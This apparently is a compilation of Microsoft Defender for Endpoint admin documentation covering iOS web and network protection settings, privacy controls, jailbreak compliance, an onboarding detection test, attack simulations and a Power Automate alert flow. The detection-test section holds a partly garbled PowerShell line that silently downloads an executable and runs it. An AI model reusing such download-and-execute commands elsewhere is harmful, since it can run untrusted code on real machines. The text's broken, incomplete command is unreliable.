device risk score. Defender for Endpoint is a Mobile Threat Defense (MTD) solution that
you can deploy to use this capability via Intune.
For more information about how to set up Conditional Access with Defender for
Endpoint on iOS, see Defender for Endpoint and Intune.
Web Protection and VPN

By default, Defender for Endpoint on iOS includes and enables the web protection
feature. Web protection helps to secure devices against web threats and protect users
from phishing attacks. Anti-phishing and custom indicators (URL and Domain) are
supported as part of Web Protection. IP based custom indicators are currently not
supported on iOS. Web Content Filtering is currently not supported on mobile platforms
(Android and iOS).
Defender for Endpoint on iOS uses a VPN in order to provide this capability. Note that
the VPN is local, and unlike traditional VPN, network traffic isn't sent outside the device.
While enabled by default, there might be some cases that require you to disable VPN.
For example, you want to run some apps that don't work when a VPN is configured. In
such cases, you can choose to disable VPN from the app on the device by following
these steps:
1. On your iOS device, open the Settings app, select General and then VPN.
2. Select the i button for Microsoft Defender for Endpoint.
3. Toggle off Connect On Demand to disable VPN.


７ Note
Web Protection isn't available when VPN is disabled. To re-enable Web Protection,
open the Microsoft Defender for Endpoint app on the device and click or tap Start
VPN.
Disable Web Protection

Web Protection is one of the key features of Defender for Endpoint and it requires a
VPN to provide that capability. The VPN used is a local/loopback VPN and not a
traditional VPN, however there are several reasons for which customers might not prefer
the VPN. Customers who don't want to set up a VPN, there's an option to disable Web
Protection and deploy Defender for Endpoint without that feature. Other Defender for
Endpoint features continue to work.
This configuration is available for both the enrolled (MDM) devices and unenrolled
(MAM) devices. For customers with MDM, admins can configure the Web Protection
through Managed devices in the App Config. For customers without enrollment, using
MAM, admins can configure the Web Protection through Managed apps in the App
Config.
Configure Web Protection

1. Disable Web Protection(MDM) Use the following steps to disable Web Protection
for enrolled devices.
In the Microsoft Intune admin center , go to Apps > App configuration

policies > Add > Managed devices.
Give the policy a name, Platform > iOS/iPadOS.
In Settings page, select Use configuration designer and add WebProtection
as the key and value type as String.
By default, WebProtection= true.
Admin needs to make WebProtection = false to switch off the web
protection.
Defender sends the heartbeat to the Microsoft Defender portal whenever
user opens the app.
Select Next and assign this profile to targeted devices/users.
2. Disable Web Protection(MAM) Use the following steps to disable Web Protection
for unenrolled devices.

policies > Add > Managed apps.
Give the policy a name.
Under the Select Public Apps, choose Microsoft Defender for Endpoint as the
target app.
In Settings page, under the General Configuration Settings, add
WebProtection as the key and value as false.
By default, WebProtection= true.
Admin needs to make WebProtection = false to switch off the web
protection.
Defender sends the heartbeat to the Microsoft Defender portal whenever
user opens the app.
Configure Network Protection

Network protection in Microsoft Defender for endpoint is disabled by default. Admins
can use the following steps to configure Network Protection. This configuration is
available for both enrolled devices through MDM config and unenrolled devices
through MAM config.
７ Note
Only one policy should be created for Network Protection, either MDM or MAM.
For enrolled devices (MDM)

Follow the below steps for setting up MDM configuration for enrolled devices for
Network protection.
2. Provide name and description for the policy. Under Platform, choose iOS/iPad.
3. In the targeted app, choose Microsoft Defender for Endpoint.
4. In the Settings page, choose configuration settings format Use configuration

designer.
5. Add 'DefenderNetworkProtectionEnable' as the configuration key, value type as

'String' and value as 'true' to enable Network Protection. (Network protection is
disabled by default.)

6. For other configurations related to Network protection, add the following keys,
choose the corresponding value type and value.
ﾉ Expand table

Type (true-
enable,
false-
disable)
DefenderOpenNetworkDetection Integer 0 1 - Audit, 0 -

Disable(default), 2 -
Enable. This setting is
managed by an IT
Admin to audit, disable,
or enable open network
detection, respectively.
In 'Audit' mode, alerts is
sent only to the ATP
portal with no end-user
experience. For end-
user experience, set the
config to 'Enable' mode.
DefenderEndUserTrustFlowEnable String false true - enable, false -

used by IT admins to
end user in-app
experience to trust and
untrust the unsecure
and suspicious
networks.
Type (true-
enable,
false-
disable)
DefenderNetworkProtectionAutoRemediation String true true - enable, false -

used by the IT admin to
remediation alerts that
are sent when a user
performs remediation
activities like switching
to safer WIFI access
points or deleting
suspicious certificates
detected by Defender.
DefenderNetworkProtectionPrivacy String true true - enable, false -

managed by IT admin to
enable or disable
privacy in network
protection.
7. In the Assignments section, admin can choose groups of users to include and
exclude from the policy.
8. Review and create the configuration policy.
For unenrolled devices (MAM)

Follow the below steps for setting up MAM config for unenrolled devices for Network
protection (Authenticator device registration is required for MAM configuration) in iOS
devices. Network Protection initialization requires the end user to open the app once.
policies > Add > Managed apps > Create a new App configuration policy.

2. Provide a name and description to uniquely identify the policy. Then select Select
Public apps, and choose Microsoft Defender for Platform iOS/iPadOS.
3. On the Settings page, add DefenderNetworkProtectionEnable as the key and the

value as true to enable network protection. (Network protection is disabled by
default.)

4. For other configurations related to network protection, add the following keys and
appropriate corresponding value.
ﾉ Expand table
Key Default Description

(true -
enable,
false -
disable)
DefenderOpenNetworkDetection 0 1 - Audit, 0 - Disable (default), 2

- Enable. This setting is
managed by an IT admin to
enable, audit, or disable open
network detection. In Audit
mode, alerts are sent only to the
ATP portal with no user side
experience. For user experience,
set the config to "Enable" mode.
DefenderEndUserTrustFlowEnable false true - enable, false - disable;

This setting is used by IT admins
to enable or disable the end
user in-app experience to trust
and untrust the unsecure and
suspicious networks.
DefenderNetworkProtectionAutoRemediation true true - enable, false - disable;

This setting is used by the IT
admin to enable or disable the
remediation alerts that are sent
when a user performs
remediation activities like
switching to safer WIFI access
Key Default Description
(true -
enable,
false -
disable)
points or deleting suspicious

certificates detected by
Defender.
DefenderNetworkProtectionPrivacy true true - enable, false - disable;

This setting is managed by IT
admin to enable or disable
privacy in network protection.
5. In the Assignments section, an admin can choose groups of users to include and
exclude from the policy.
6. Review and create the configuration policy.
Coexistence of multiple VPN profiles

Apple iOS doesn't support multiple device-wide VPNs to be active simultaneously. While
multiple VPN profiles can exist on the device, only one VPN can be active at a time.
Configure Microsoft Defender for Endpoint risk

signal in app protection policy (MAM)
Microsoft Defender for Endpoint on iOS enables the App Protection Policy scenario.
End-users can install the latest version of the app directly from the Apple app store.
Ensure the device is registered to Authenticator with the same account being used to
onboard in Defender for successful MAM registration.
Microsoft Defender for Endpoint can be configured to send threat signals to be used in
App Protection Policies (APP, also known as MAM) on iOS/iPadOS. With this capability,
you can use Microsoft Defender for Endpoint to protect access to corporate data from
unenrolled devices as well.
Follow the steps in the following link to set up app protection policies with Microsoft
Defender for Endpoint Configure Defender risk signals in app protection policy (MAM)
For more details on MAM or app protection policy, see iOS app protection policy
settings.
Privacy Controls
Microsoft Defender for Endpoint on iOS enables Privacy Controls for both the Admins
and the End Users. This includes the controls for enrolled (MDM) and unenrolled (MAM)
devices.
For Customers with MDM, admins can configure the Privacy Controls through Managed
devices in the App Config. For Customers without enrollment, using MAM, admins can
configure the Privacy Controls through Managed apps in the App Config. End Users will
also have the ability to configure the Privacy Settings from the Defender App settings.
Configure privacy in phish alert report

Customers can now enable privacy control for the phish report sent by Microsoft
Defender for Endpoint on iOS so that the domain name isn't included as part of a phish
alert whenever a phish website is detected and blocked by Microsoft Defender for
Endpoint.
1. Admin Privacy Controls (MDM) Use the following steps to enable privacy and not
collect the domain name as part of the phish alert report for enrolled devices.
a. In the Microsoft Intune admin center , go to Apps > App configuration

b. Give the policy a name, Platform > iOS/iPadOS, select the profile type.
c. Select Microsoft Defender for Endpoint as the target app.

d. On the Settings page, select Use configuration designer and add
DefenderExcludeURLInReport as the key and value type as Boolean.
To enable privacy and not collect the domain name, enter the value as
true and assign this policy to users. By default, this value is set to false .
For users with key set as true , the phish alert doesn't contain the domain
name information whenever a malicious site is detected and blocked by
e. Select Next and assign this profile to targeted devices/users.
2. Admin Privacy Controls (MAM) Use the following steps to enable privacy and not
collect the domain name as part of the phish alert report for unenrolled devices.
a. In the Microsoft Intune admin center , go to Apps > App configuration

b. Give the policy a name.
c. Under Select Public Apps, choose Microsoft Defender for Endpoint as the
target app.
d. On the Settings page, under the General Configuration Settings, add

DefenderExcludeURLInReport as the key and value as true .
To enable privacy and not collect the domain name, enter the value as
true and assign this policy to users. By default, this value is set to false .
For users with key set as true , the phish alert doesn't contain the domain
name information whenever a malicious site is detected and blocked by
e. Select Next and assign this profile to targeted devices/users.
3. End User Privacy Controls These controls help the end user to configure the
information shared to their organization.
For Supervised devices, End User controls aren't visible. Your admin decides and
controls the settings. However, for Unsupervised devices, the control is displayed
under the Settings > Privacy.
Users see a toggle for Unsafe Site Info.

This toggle is only visible if Admin has set DefenderExcludeURLInReport =
true.
If enabled by an Admin, Users can decide if they want to send the unsafe site
info to their Organization or not.
By default, it's set to false . The unsafe site information isn't sent.
If user toggles it to true , the unsafe site details are sent.
Turning the above privacy controls on or off doesn't impact the device compliance
check or conditional access.
７ Note
On Supervised devices with the configuration profile, Microsoft Defender for

Endpoint can access the entire URL and if it is found to be phishing, it is blocked.
On an Unsupervised device, Microsoft Defender for Endpoint has access to only the
domain name, and if the domain is not a phishing URL, it won't be blocked.
Optional Permissions
Microsoft Defender for Endpoint on iOS enables Optional Permissions in the
onboarding flow. Currently the permissions required by Defender for Endpoint are
mandatory in the onboarding flow. With this feature, admins can deploy Defender for
Endpoint on BYOD devices without enforcing the mandatory VPN Permission during
onboarding. End users can onboard the app without the mandatory permissions and
can later review these permissions. This feature is currently present only for enrolled
devices (MDM).
Configure Optional Permission

1. Admin flow (MDM) Use the following steps to enable Optional VPN permission
for enrolled devices.

Give the policy a name, select Platform > iOS/iPadOS.
On the Settings page, select Use configuration designer and add

DefenderOptionalVPN as the key and value type as Boolean.
To enable optional VPN permission, enter value as true and assign this
policy to users. By default, this value is set to false .
For users with key set as true , the users are able to onboard the app
without giving the VPN permission.
2. End User flow - User installs and opens the app to start the onboarding.
If an admin has set up optional permissions, then the user can Skip VPN
permission and complete onboarding.
Even if the user has skipped VPN, the device is able to onboard, and a
heartbeat is sent.
If VPN is disabled, web protection isn't active.
Later, the user can enable web protection from within the app, which installs
the VPN configuration on the device.
７ Note
Optional Permission is different from Disable Web Protection. Optional VPN

Permission only helps to skip the permission during onboarding but its available for
the end user to later review and enable it. While Disable Web Protection allows
users to onboard the Defender for Endpoint app without the Web Protection. It
cannot be enabled later.
Jailbreak detection
Microsoft Defender for Endpoint has the capability of detecting unmanaged and
managed devices that are jailbroken. These jailbreak checks are done periodically. If a
device is detected as jailbroken, these events occur:
High-risk alert is reported to the Microsoft Defender portal. If device Compliance

and Conditional Access is set up based on device risk score, then the device is
blocked from accessing corporate data.
User data on app is cleared. When user opens the app after jailbreaking the VPN
profile also is deleted and no web protection is offered.
Configure compliance policy against jailbroken devices

To protect corporate data from being accessed on jailbroken iOS devices, we
recommend that you set up the following compliance policy on Intune.
７ Note
Jailbreak detection is a capability provided by Microsoft Defender for Endpoint on

iOS. However, we recommend that you setup this policy as an additional layer of
defense against jailbreak scenarios.
Follow the steps below to create a compliance policy against jailbroken devices.
1. In the Microsoft Intune admin center , go to Devices > Compliance policies >
Create Policy. Select "iOS/iPadOS" as platform and select Create.
2. Specify a name of the policy, such as Compliance Policy for Jailbreak.
3. In the compliance settings page, select to expand Device Health section and select
Block for Jailbroken devices field.

4. In the Actions for noncompliance section, select the actions as per your
requirements and select Next.
5. In the Assignments section, select the user groups that you want to include for this
policy and then select Next.
6. In the Review+Create section, verify that all the information entered is correct and
then select Create.
Configure custom indicators

Defender for Endpoint on iOS enables admins to configure custom indicators on iOS
devices as well. For more information on how to configure custom indicators, see
Manage indicators.
７ Note
Defender for Endpoint on iOS supports creating custom indicators only for URLs
and domains. IP based custom indicators is not supported on iOS.
For iOS, no alerts are generated on Microsoft Defender XDR when the URL or
domain set in the indicator is accessed.
Configure vulnerability assessment of apps

Reducing cyber risk requires comprehensive risk-based vulnerability management to
identify, assess, remediate, and track all your biggest vulnerabilities across your most
critical assets, all in a single solution. Visit this page to learn more about Microsoft
Defender Vulnerability Management in Microsoft Defender for Endpoint.
Defender for Endpoint on iOS supports vulnerability assessments of OS and apps.

Vulnerability assessment of iOS versions is available for both enrolled (MDM) and
unenrolled (MAM) devices. Vulnerability assessment of apps is only for enrolled (MDM)
devices. Admins can use the following steps to configure the vulnerability assessment of
apps.
On a Supervised Device
1. Ensure the device is configured in the Supervised mode.
2. To enable the feature in the Microsoft Intune admin center , go to Endpoint

Security > Microsoft Defender for Endpoint > Enable App sync for iOS/iPadOS
devices.
７ Note
To get the list of all the apps including unmanaged apps, the admin has to enable
Send full application inventory data on personally owned iOS/iPadOS devices in
the Intune Admin Portal for the supervised devices marked as "Personal". For the
supervised devices marked as "Corporate" in the Intune Admin Portal, the admin
need not enable Send full application inventory data on personally owned
iOS/iPadOS devices.
On an Unsupervised Device
1. To enable the feature in the Microsoft Intune admin center , go to Endpoint
Security > Microsoft Defender for Endpoint > Enable App sync for iOS/iPadOS
devices.
2. To get the list of all the apps including unmanaged apps, enable the toggle Send
full application inventory data on personally owned iOS/iPadOS devices.
3. Use the following steps to configure the privacy setting.
Go to Apps > App configuration policies > Add > Managed devices.
Give the policy a name, Platform > iOS/iPadOS.
In Settings page, select Use configuration designer and add
DefenderTVMPrivacyMode as the key and value type as String.
To disable privacy and collect the list of apps installed, enter value as
False and assign this policy to users.
By default, this value is set to True for unsupervised devices.

For users with key set as False , Defender for Endpoint will send the list of
apps installed on the device for vulnerability assessment.
Click Next and assign this profile to targeted devices/users.
Turning the above privacy controls on or off will not impact the device
compliance check or conditional access.
4. Once the config is applied, end-user will need to open the app to Approve the
privacy setting.
Privacy approval screen will come only for unsupervised devices.
Only if end-user approves the privacy, the app information is sent to the
Defender for Endpoint console.

Once the client versions are deployed to target iOS devices, the processing will start.
Vulnerabilities found on those devices will start showing up in the Defender Vulnerability
Management dashboard. The processing might take few hours (max 24 hours) to
complete. Especially for the entire list of apps to show up in the software inventory.
７ Note
If you're using SSL inspection solution within your iOS device, please allow list these
domain names securitycenter.windows.com (in commercial environment) and
securitycenter.windows.us (in GCC environment) for TVM feature to work.
Disable sign out

Defender for Endpoint on iOS supports deployment without sign out button in the app
to prevent users from signing out of the Defender app. This is important to prevent
users from tampering the device.
This configuration is available for both the enrolled (MDM) devices as well as unenrolled
(MAM) devices. Admins can use the following steps to configure the Disable sign out
Configure Disable sign out

For enrolled devices(MDM)
2. Give the policy a name, select Platform > iOS/iPadOS
4. In Settings page, select Use configuration designer and add DisableSignOut as the
key and value type as String.
5. By default, DisableSignOut = false.
6. Admin needs to make DisableSignOut = true to disable the sign-out button in the
app. Users will not see the sign out button once the policy is pushed.
7. Click Next and assign this policy to targeted devices/users.
For unenrolled devices(MAM)
target app.
4. In Settings page, add DisableSignOut as the key and value as true, under the
General Configuration Settings.
5. By default, DisableSignOut = false.
6. Admin needs to make DisableSignOut = true to disable the sign-out button in the
app. Users will not see the sign out button once the policy is pushed.
） Important

provided here.
Device Tagging
Defender for Endpoint on iOS enables bulk tagging the mobile devices during
This configuration is available for both the enrolled (MDM) devices as well as unenrolled
(MAM) devices. Admins can use the following steps to configure the Device tags.
Configure Device tags

For enrolled devices(MDM)
2. Give the policy a name, select Platform > iOS/iPadOS

DefenderDeviceTag.
For unenrolled devices(MAM)
target app.
4. In Settings page, add DefenderDeviceTag as the key under the General
Configuration Settings.
DefenderDeviceTag.
７ Note
Configure option to send in-app feedback

Customers now have the option to configure the ability to send feedback data to
Microsoft within the Defender for Endpoint app. Feedback data helps Microsoft improve
products and troubleshoot issues.
７ Note
For US Government cloud customers, feedback data collection is disabled by

default.
Use the following steps to configure the option to send feedback data to Microsoft:
1. In the Microsoft Intune admin center , go to Apps > App configuration policies
2. Give the policy a name, and select Platform > iOS/iPadOS as the profile type.
4. On the Settings page, select Use configuration designer and add

DefenderFeedbackData as the key and value type as Boolean.
To remove the ability of end-users to provide feedback, set the value as

false and assign this policy to users. By default, this value is set to true . For
US Government customers, the default value is set to 'false'.
For users with key set as true , there is an option to send Feedback data to
Microsoft within the app (Menu > Help & Feedback > Send Feedback to
Microsoft).
Report unsafe site

Phishing websites impersonate trustworthy websites for the purpose of obtaining your
personal or financial information. Visit the Provide feedback about network protection
page to report a website that could be a phishing site.
 Tip
Feedback

Privacy information - Microsoft
Defender for Endpoint on iOS
Article • 11/15/2023
Applies to:

７ Note
Defender for Endpoint on iOS uses a VPN to provide the Web Protection feature.
This is not a regular VPN and is a local or self-looping VPN that does not take
traffic outside the device. Microsoft or your organization, does not see your
browsing activity.
Defender for Endpoint on iOS collects information from your configured iOS devices
and stores it in the same tenant where you have Defender for Endpoint. The information
is collected to help keep Defender for Endpoint on iOS secure, up to date, performing as
expected, and to support the service.
For more information about data storage, see Microsoft Defender for Endpoint data
For more information on most common privacy questions about Microsoft Defender for
Endpoint on Android and iOS mobile devices, see Microsoft Defender for Endpoint and
your privacy on Android and iOS mobile devices .
Required data
Required data consists of data that is necessary to make Defender for Endpoint on iOS
work as expected. This data is essential to the operation of the service and can include
data related to the end user, organization, device, and apps.
Here is a list of the types of data being collected:

Web page or Network information
Domain name and IP address of the website only when a malicious connection or
web page is detected. Information is collected only when Privacy setting is
disabled or turned off.
Device and account information

Device information such as date & time, iOS version, CPU info, and Device
identifier, where Device identifier is one of the following:
Wi-Fi adapter MAC address
Randomly generated globally unique identifier (GUID)
Tenant, Device, and User information
Microsoft Entra Device ID and Azure User ID - Uniquely identifies the device,
User respectively at Microsoft Entra ID.
Azure tenant ID - GUID that identifies your organization within Microsoft Entra
ID.
Microsoft Defender for Endpoint org ID - Unique identifier associated with the
enterprise that the device belongs to. Allows Microsoft to identify if there are
issues affecting a select set of enterprises and the number of enterprises
impacted.
User Principal Name - Email ID of the user.
Product and service usage data

The following information is collected only for Microsoft Defender for Endpoint app
installed on the device.
App package info, including name, version, and app upgrade status.
Actions done in the app.
Crash report logs generated by iOS.
Memory usage data.
Optional Data
Optional data includes diagnostic data and feedback data from the client. Optional
diagnostic data is additional data that helps us make product improvements and
provides enhanced information to help us detect, diagnose, and fix issues. This data is
only for diagnostic purposes and is not required for the service itself.
Optional diagnostic data includes:

App, CPU, and network usage for Defender for Endpoint.
Features configured by the admin for Defender for Endpoint.
Feedback Data is collected through in-app feedback provided by the user.
The user's email address, if they choose to provide it.

Feedback type (smile, frown, idea) and any feedback comments submitted by the
user.
For more information, see More on Privacy .
 Tip
Feedback

Run a detection test on a device
recently onboarded to Microsoft
Article • 02/22/2024
Applies to:
Windows 11
Supported Windows 10 versions
Windows Server 2016
Windows Server, version 1803
Windows Server 2019
Windows Server 2022
When you add a device to the Microsoft Defender for Endpoint service for management,
it's referred to as onboarding. Onboarding allows devices to report signals about their
health status to the service.
Verifying that a device is added to the service successfully is a critical step in the entire
deployment process. It helps ensure that all the devices expected are being managed.
Verify Microsoft Defender for Endpoint

onboarding of a device using a PowerShell
detection test
Run the following PowerShell script on a newly onboarded device to verify that it's
properly reporting to the Defender for Endpoint service.
b. Right-click Command Prompt and select Run as administrator.


2. At the prompt, copy and run the following command:
PowerShell

$ErrorActionPreference = 'silentlycontinue';(New-Object
MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-
test\\invoice.exe'
The Command Prompt window closes automatically. If successful, a new alert appears in
the portal for the onboarded device in about 10 minutes.
７ Note
You can also use the EICAR test string to perform this test. Create a text file, paste
the EICAR line, and save the file as an executable file to your endpoint's local drive.
You will receive a test endpoint notification and an alert in the Microsoft Defender
portal.
Related articles
Onboard servers
 Tip
Feedback

Integration with Microsoft Defender for
Cloud
Article • 07/18/2023
Applies to:

Microsoft Defender for Endpoint can integrate with Microsoft Defender for Cloud to
provide a comprehensive Windows server protection solution. With this integration,
Microsoft Defender for Cloud can use the power of Defender for Endpoint to provide
improved threat detection for Windows Servers.
The following capabilities are included in this integration:
Automated onboarding - Defender for Endpoint sensor is automatically enabled

on Windows Servers that are onboarded to Microsoft Defender for Cloud. For
more information on Microsoft Defender for Cloud onboarding, see Use the
integrated Microsoft Defender for Endpoint license.
７ Note
The integration between Microsoft Defender for servers and Microsoft

Defender for Endpoint has been expanded to support Windows Server 2019
and Azure Virtual Desktop (AVD).
Windows servers monitored by Microsoft Defender for Cloud will also be available
in Defender for Endpoint - Microsoft Defender for Cloud seamlessly connects to
the Defender for Endpoint tenant, providing a single view across clients and
servers. In addition, Defender for Endpoint alerts will be available in the Microsoft
Defender for Cloud console.
Server investigation - Microsoft Defender for Cloud customers can access the
Microsoft Defender portal to perform detailed investigation to uncover the scope
of a potential breach.
） Important
When you use Microsoft Defender for Cloud to monitor servers, a Defender
for Endpoint tenant is automatically created (in the US for US users, in the EU
for European and UK users). Data collected by Defender for Endpoint is stored
in the geo-location of the tenant as identified during provisioning.
If you use Defender for Endpoint before using Microsoft Defender for Cloud,
your data will be stored in the location you specified when you created your
tenant even if you integrate with Microsoft Defender for Cloud at a later time.
Once configured, you cannot change the location where your data is stored. If
you need to move your data to another location, you need to contact
Microsoft Support to reset the tenant. Server endpoint monitoring utilizing
this integration has been disabled for Office 365 GCC customers.
Related topics
Onboard Windows Server 2012 R2, 2016, SAC version 1803, and 2019
 Tip
Feedback

Experience Microsoft Defender for
Endpoint through simulated attacks
Article • 07/18/2023
Applies to:

 Tip
Learn about the latest enhancements in Microsoft Defender for Endpoint:

What's new in Defender for Endpoint? .
Defender for Endpoint demonstrated industry-leading optics and detection
capabilities in the recent MITRE evaluation. Read: Insights from the MITRE
ATT&CK-based evaluation .
You might want to experience Defender for Endpoint before you onboard more than a
few devices to the service. To do this, you can run controlled attack simulations on a few
test devices. After running the simulated attacks, you can review how Defender for
Endpoint surfaces malicious activity and explore how it enables an efficient response.
Before you begin

To run any of the provided simulations, you need at least one onboarded device.
Read the walkthrough document provided with each attack scenario. Each document
includes OS and application requirements as well as detailed instructions that are
specific to an attack scenario.
Run a simulation
1. In Endpoints > Evaluation & tutorials > Tutorials & simulations, select which of
the available attack scenarios you would like to simulate:
Scenario 1: Document drops backdoor - simulates delivery of a socially
engineered lure document. The document launches a specially crafted
backdoor that gives attackers control.
Scenario 2: PowerShell script in fileless attack - simulates a fileless attack
that relies on PowerShell, showcasing attack surface reduction and device
learning detection of malicious memory activity.
Scenario 3: Automated incident response - triggers automated investigation,
which automatically hunts for and remediates breach artifacts to scale your
incident response capacity.
2. Download and read the corresponding walkthrough document provided with your
selected scenario.
3. Download the simulation file or copy the simulation script by navigating to

Evaluation & tutorials > Tutorials & simulations. You can choose to download the
file or script on the test device but it's not mandatory.
4. Run the simulation file or script on the test device as instructed in the walkthrough
document.
７ Note
Simulation files or scripts mimic attack activity but are actually benign and will not
harm or compromise the test device.
You can also use the EICAR test file or the EICAR test text string to perform some
tests. It is possible to test real-time protection features (create a text file, paste the
EICAR text, and save the file as an executable file to your endpoint's local drive—
you will get a notification on the test endpoint and an alert in the MDE console) or
EDR protection (you need to temporarily disable real-time protection on the test
endpoint and save the EICAR test file, and then try to execute, copy, or move this
file). After you run your tests, enable real-time protection on the test endpoint.
Related topics
Onboard devices
 Tip
Feedback

Create a notification rule when a local
onboarding or offboarding script is used
Article • 02/22/2024
Applies to:

７ Note
If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.
 Tip
For better performance, you can use server closer to your geo location:
api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com
Create a notification rule so that when a local onboarding or offboarding script is used,
you are notified.
Before you begin

You need to have access to:
Power Automate (Per-user plan at a minimum). For more information, see Power
Automate pricing page .
Azure Table or SharePoint List or Library / SQL DB.
Create the notification flow
1. In make.powerautomate.com .
2. Navigate to My flows > New > Scheduled - from blank.
3. Build a scheduled flow.

a. Enter a flow name.
b. Specify the start and time.
c. Specify the frequency. For example, every 5 minutes.
4. Select the + button to add a new action. The new action is an HTTP request to the
Defender for Endpoint devices API. You can also replace it with the out-of-the-box
WDATP Connector (action: Machines - Get list of machines).

5. Enter the following HTTP fields:
Method: GET as a value to get the list of devices.

URI: Enter https://api.securitycenter.microsoft.com/api/machines .
Authentication: Select Active Directory OAuth.
Tenant: Sign-in to https://portal.azure.com and navigate to Microsoft Entra
ID > App Registrations and get the Tenant ID value.
Audience: https://securitycenter.onmicrosoft.com/windowsatpservice\
Client ID: Sign-in to https://portal.azure.com and navigate to Microsoft
Entra ID > App Registrations and get the Client ID value.
Credential Type: Select Secret.
Secret: Sign-in to https://portal.azure.com and navigate to Microsoft Entra
ID > App Registrations and get the Tenant ID value.

6. Add a new step by selecting Add new action then search for Data Operations and
select Parse JSON.

7. Add Body in the Content field.
8. Select the Use sample payload to generate schema link.


9. Copy and paste the following JSON snippet:
JSON
{
"type": "object",
"properties": {
"@@odata.context": {
"type": "string"
},
"value": {
"type": "array",
"items": {
"type": "object",
"properties": {
"id": {
"type": "string"
},
"computerDnsName": {
"type": "string"
},
"firstSeen": {
"type": "string"
},
"lastSeen": {
"type": "string"
},
"osPlatform": {
"type": "string"
},
"osVersion": {},
"lastIpAddress": {
"type": "string"
},
"lastExternalIpAddress": {
"type": "string"
},
"agentVersion": {
"type": "string"
},
"osBuild": {
"type": "integer"
},
"healthStatus": {
"type": "string"
},
"riskScore": {
"type": "string"
},
"exposureScore": {
"type": "string"
},
"aadDeviceId": {},
"machineTags": {
"type": "array"
}
},
"required": [
"id",
"computerDnsName",
"firstSeen",
"lastSeen",
"osPlatform",
"osVersion",
"lastIpAddress",
"lastExternalIpAddress",
"agentVersion",
"osBuild",
"healthStatus",
"rbacGroupId",
"rbacGroupName",
"riskScore",
"exposureScore",
"aadDeviceId",
"machineTags"
]
}
}
}
}
10. Extract the values from the JSON call and check if the onboarded devices is / are
already registered at the SharePoint list as an example:
If yes, no notification is triggered

If no, will register the newly onboarded devices in the SharePoint list and a
notification is sent to the Defender for Endpoint admin


11. Under Condition, add the following expression: "length(body('Get_items')?

['value'])" and set the condition to equal to 0.


 
Alert notification
The following image is an example of an email notification.

Tips
You can filter here using lastSeen only:
Every 60 min:
Take all devices last seen in the past seven days.
For each device:

If last seen property is on the one hour interval of [-7 days, -7days + 60
minutes] -> Alert for offboarding possibility.
If first seen is on the past hour -> Alert for onboarding.
In this solution, you don't have duplicate alerts.
There are tenants that have numerous devices. Getting all those devices might require
paging.
You can split it to two queries:
1. For offboarding take only this interval using the OData $filter and only notify if the
conditions are met.
2. Take all devices last seen in the past hour and check first seen property for them (if
the first seen property is on the past hour, the last seen must be there too).
 Tip
Feedback

Manage endpoint security policies on
devices onboarded to Microsoft
Article • 02/06/2024
When you use Microsoft Defender for Endpoint, you can deploy endpoint security
policies from Microsoft Intune to manage the Defender security settings on the devices
you’ve onboarded to Defender without enrolling those devices with Intune. This
capability is known as Defender for Endpoint security settings management.
When you manage devices through security settings management:
You can use the Microsoft Intune admin center or the Microsoft 365 Defender
portal to configure policies for endpoint security for Defender for Endpoint and
assign those policies to Microsoft Entra ID groups. The Defender portal includes
the user interface for device views, policy management, and reports for security
settings management.
To view guidance on managing the Intune endpoint security policies from within
the Defender portal, see Manage endpoint security policies in Microsoft Defender
for Endpoint in the Defender content.
Devices get their assigned policies based on their Entra ID device object. A device
that isn’t already registered in Microsoft Entra is joined as part of this solution.
When a device receives a policy, the Defender for Endpoint components on the
device enforce the policy and report on the device's status. The device's status is
available in the Microsoft Intune admin center and the Microsoft Defender portal.
This scenario extends the Microsoft Intune Endpoint Security surface to devices that
aren't capable of enrolling in Intune. When a device is managed by Intune (enrolled to
Intune) the device doesn't process policies for Defender for Endpoint security settings
management. Instead, use Intune to deploy policy for Defender for Endpoint to your
devices.
Applies to:
Windows 10 and Windows 11

Windows Server (2012 R2 and up)
Linux
macOS

Prerequisites
Review the following sections for requirements for the Defender for Endpoint security
settings management Scenario.
Environment
When a supported device onboards to Microsoft Defender for Endpoint:
The device is surveyed for an existing Microsoft Intune presence, which is a mobile
device management (MDM) enrollment to Intune.
Devices without an Intune presence enable the security settings management
feature.
For devices that aren't fully Microsoft Entra registered, a synthetic device identity is
created in Microsoft Entra ID that allows the device to retrieve policies. Fully
registered devices use their current registration.
Policies retrieved from Microsoft Intune are enforced on the device by Microsoft
Security settings management isn't yet supported with Government clouds. For more
information, see Feature parity with commercial in Microsoft Defender for Endpoint for US
Government customers.
Connectivity requirements
Devices must have access to the following endpoint:
*.dm.microsoft.com - The use of a wildcard supports the cloud-service endpoints
that are used for enrollment, check-in, and reporting, and which can change as the
service scales.
Supported platforms
Policies for Microsoft Defender for Endpoint security management are supported for the
following device platforms:
Linux:
With Microsoft Defender for Endpoint for Linux agent version 101.23052.0009 or later,
security settings management supports the following Linux distributions:
Red Hat Enterprise Linux 7.2 or higher

CentOS 7.2 or higher
Ubuntu 16.04 LTS or higher LTS
Debian 9 or higher
SUSE Linux Enterprise Server 12 or higher
Oracle Linux 7.2 or higher
Amazon Linux 2
Fedora 33 or higher
To confirm the version of the Defender agent, in the Defender portal go to the devices
page, and on the devices Inventories tab, search for Defender for Linux. For guidance on
updating the agent version, see Deploy updates for Microsoft Defender for Endpoint on
Linux.
Known issue: With the Defender agent version 101.23052.0009, Linux devices fail to
enroll when they're missing the following filepath: /sys/class/dmi/id/board_vendor .
macOS:
With Microsoft Defender for Endpoint for macOS agent version 101.23052.0004 or later,
security settings management supports the following macOS versions:
macOS 14 (Sonoma)
macOS 13 (Ventura)
macOS 12 (Monterey)
macOS 11 (Big Sur)
To confirm the version of the Defender agent, in the Defender portal go to the devices
page, and on the devices Inventories tab, search for Defender for macOS. For guidance
on updating the agent version, see Deploy updates for Microsoft Defender for Endpoint
on macOS.
Known issue: With the Defender agent version 101.23052.0004, macOS devices that are
registered in Microsoft Entra ID before enrolling with security settings management
receive a duplicate Device ID in Microsoft Entra ID, which is a synthetic registration.
When you create a Microsoft Entra group for targeting policy, you must use the
synthetic Device ID created by security settings management. In Microsoft Entra ID, the
Join Type column for the synthetic Device ID is blank.
Windows:
Windows 10 Professional/Enterprise (with KB5006738 )

Windows 11 Professional/Enterprise
Windows Server 2012 R2 with Microsoft Defender for Down-Level Devices
Windows Server 2016 with Microsoft Defender for Down-Level Devices
